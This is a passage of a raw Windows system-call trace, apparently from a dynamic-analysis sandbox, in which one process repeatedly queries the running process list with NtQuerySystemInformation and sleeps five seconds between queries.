BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.945] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.953] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.961] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.968] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.989] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.000] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.009] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.019] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.028] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.036] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.048] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.055] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.063] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.075] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.084] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.095] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.103] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.114] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.122] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.131] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.143] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, 